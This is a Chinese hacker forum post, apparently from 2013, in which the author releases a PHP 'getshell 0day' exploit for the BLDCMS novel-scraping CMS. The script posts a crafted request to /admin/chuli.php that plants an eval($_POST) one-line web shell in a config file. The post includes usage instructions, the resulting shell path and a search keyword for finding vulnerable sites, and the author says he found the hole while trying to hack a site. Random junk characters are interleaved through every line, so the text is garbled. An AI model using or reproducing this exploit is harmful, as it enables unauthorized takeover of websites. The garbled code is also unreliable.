之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
( C* D$ G1 ?( N' _; l ) O: [) x) ]; m2 |5 l
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
! O* N. B9 |+ _ ' r9 g. r9 w7 H$ w: ^3 O
既然都有人发了 我就把我之前写好的EXP放出来吧
5 I _3 i! v$ G, y2 c# C, I0 `view source print?01.php;">7 Z# R, q( w9 t3 F" b
02.<!--?php! {8 A6 c' ~8 i: d% y# {
03.echo "------------------------------------------------------------------- t7 O* I4 P- d; f, E$ c+ G S5 Q
04.
2 G9 X9 y; [* O' m9 E! U5 S0 ~2 n05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
' u$ S4 x* f- X06.
3 m1 @: t. B9 I07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
! c4 f$ b/ J- n# Y, M08.
. c5 Q3 P, g' U# a3 r; ]09.QQ:981009941\r\n 2013.3.21\r\n
+ ?! T$ @( z9 e10. m7 g+ g1 P/ @
11. ) v1 F% T- O3 v$ K0 J* e$ K+ v
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码* I* k" `3 y' x: k* w8 N
13. Y6 | s$ s3 A
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------5 |; M) j t \$ ~
15.
" \: y( _# v4 W16.--------------------------------------------------------------------\r\n";" j, N! T: y7 Z1 V6 _. e" `
17.$url=$argv[1];
% j: ?$ ` j, @% b/ r2 [18.$dir=$argv[2];
9 f1 c8 Y n* c+ c19.$pass=$argv[3];
+ b1 p K& L. t5 r+ f2 U% N20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';; r M9 ~; x: C4 A8 S/ Q: X" o1 G
21.if (emptyempty($pass)||emptyempty($url))! G9 k5 h6 F$ R+ g- F
22.{exit("请输入参数");}
/ r6 K" R1 ]9 y4 o23.else
" {$ E+ o: U" X0 b; a24.{/ O+ f9 E. W2 E' X. \) z
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
" u y" z' X1 k0 o& x x6 J4 |) j9 V26.
" ^7 F+ G' e. l: R2 w27.al;6 j6 X9 R) Q, a! l0 z; L8 H
28.$length = strlen($fuckdata);
3 H @; K% a& h3 L; w; T g29.function getshell($url,$pass)
: M# U* \' Y" w$ h* X% @3 v30.{; H; s& b1 A# z, P+ o
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
0 m! {4 I. S% f1 z$ }32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
" D! r0 L- s3 H+ d/ R* u* s$ T33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
3 s0 \8 R! L' C8 C34.$header .= "User-Agent: MSIE\r\n";
6 L+ i4 r7 k- Y& N' V35.$header .= "Host:".$url."\r\n";
7 j$ @: B& y% a, E36.$header .= "Content-Length: ".$length."\r\n";
# @, n' [: L1 p, F/ y3 h( b$ Z37.$header .= "Connection: Close\r\n";9 E. `5 Q6 ^5 c& S0 N- a: ]8 ^! r
38.$header .="\r\n";
6 m# C8 ]( ~9 n/ p7 E# C# F( ~; _39.$header .= $fuckdata."\r\n\r\n";
3 J2 v2 `. z, K' p6 Z40.$fp = fsockopen($url, 80,$errno,$errstr,15);; B5 R( i# k4 m7 l7 Y( d( {
41.if (!$fp)
* C3 i6 v2 {% E$ X1 N P42.{
8 u3 x# B9 s8 ^ G M43.exit ("利用失败:请检查指定目标是否能正常打开");
" k3 G$ w1 D# U! N44.}$ [3 @3 {3 k: ~( M
45.else{ if (!fputs($fp,$header))
4 h; L! F. D2 G/ R+ T$ ]. ^46.{exit ("利用失败");}
8 ]( a3 t# A+ ~, S* `47.else6 P! I: c4 K7 H" _& C2 H
48.{) g1 Q4 S8 @) `2 I
49.$receive = '';. ~$ t+ Z2 ^$ |7 P- s) m) N
50.while (!feof($fp)) {
! u& U; T5 m2 O2 }! f51.$receive .= @fgets($fp, 1000);
- E6 Q8 k1 F5 G* h T- P52.}: z5 X E2 b6 S B
53.@fclose($fp);
! Z9 V( m4 O, k) ?0 A3 c. u54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标5 `/ b0 P* r$ c* ]3 X8 @
55.
( j& J1 O+ S* Y0 F9 v9 k4 N0 \56.GPC是否=off)";5 S1 s- g5 N7 d7 c
57.}}0 H( q- }. ~' [; \
58.}
2 r& l: {8 c! y59.}& x+ v1 t# C2 q* c
60.getshell($url,$pass);
1 _* f& w: g- ?/ |1 R61.?-->/ n% }6 j1 D7 Y4 S7 u1 F7 T. [. F
8 R" Y* b8 F; X: Z! |! ]
, p& C: ~. N+ f. d
by 数据流
- [1 Y I# F, z2 k0 L8 v |